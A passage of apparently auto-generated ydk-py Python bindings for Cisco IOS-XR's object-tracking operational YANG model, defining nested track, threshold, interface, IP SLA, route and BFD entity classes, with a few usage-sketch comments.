from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.BoolTracks']['meta_info']
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
Weight is the number assigned to a track object. For a threshold weight type (i.e. a weighted sum list), the weight is assigned by the user at configuration time. For a threshold percentage type (i.e. a percentage based list), the weight is computed internally as (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/threshold-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.ThresholdTracks']['meta_info']
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/tracking-interaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.TrackingInteraces']['meta_info']
class Delayed(_Entity_):
"""
Indicates whether the state change delay counter is in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. True means track is up; False means track is down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo.Delayed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachability']['meta_info']
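# Usage sketch (illustrative): reading the RTR (IP SLA) reachability table;
# attribute names follow ydk-py's hyphen-to-underscore convention:
#
#     for info in tracking.track_type_rtr_reachability.track_info:
#         ipsla = info.track_type_info.ipsla_tracks
#         print(info.tracke_name, ipsla.ipsla_op_id, ipsla.rtt,
#               ipsla.return_code_string)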
class TrackTypeRtrReachabilityBrief(_Entity_):
"""
Object Tracking Type RTR Reachability brief info
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief, self).__init__()
self.yang_name = "track-type-rtr-reachability-brief"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief))])
self._leafs = OrderedDict()
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-type-rtr-reachability-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief, [], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-type-rtr-reachability-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
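# Note on the 'prefix' leaf above: the model exposes it as a bare uint32.
# Assuming it encodes an IPv4 address (an assumption; the YANG description
# says only "Prefix"), the standard-library ipaddress module renders it:
#
#     import ipaddress
#     # 'route' is a hypothetical, populated RouteTracks instance
#     print('%s/%s' % (ipaddress.IPv4Address(route.prefix), route.prefix_length))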
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-rtr-reachability-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeRtrReachabilityBrief']['meta_info']
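# Usage sketch (not part of the generated model): reading this brief
# RTR-reachability table with YDK's CRUDService. The device address and
# credentials below are hypothetical placeholders.
#
#     from ydk.services import CRUDService
#     from ydk.providers import NetconfServiceProvider
#
#     provider = NetconfServiceProvider(address='198.51.100.1',
#                                       username='admin', password='admin')
#     tracking = CRUDService().read(provider, ObjectTracking())
#     for brief in tracking.track_type_rtr_reachability_brief.track_info_brief:
#         print(brief.tracke_name, brief.track_state)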
class Tracks(_Entity_):
"""
Object Tracking Track table
.. attribute:: track
Track name \- maximum 32 characters
**type**\: list of :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks, self).__init__()
self.yang_name = "tracks"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track", ("track", ObjectTracking.Tracks.Track))])
self._leafs = OrderedDict()
self.track = YList(self)
self._segment_path = lambda: "tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks, [], name, value)
class Track(_Entity_):
"""
Track name \- maximum 32 characters
.. attribute:: track_name (key)
Track name
**type**\: str
**length:** 1..32
**config**\: False
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track, self).__init__()
self.yang_name = "track"
self.yang_parent_name = "tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['track_name']
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.Tracks.Track.TrackInfo))])
self._leafs = OrderedDict([
('track_name', (YLeaf(YType.str, 'track-name'), ['str'])),
])
self.track_name = None
self.track_info = YList(self)
self._segment_path = lambda: "track" + "[track-name='" + str(self.track_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.Tracks.Track, ['track_name'], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Is the state change delay counter in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks.Track.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.Tracks.Track.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.Tracks.Track.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.Tracks.Track.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.Tracks.Track.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.Tracks.Track.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.Tracks.Track.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
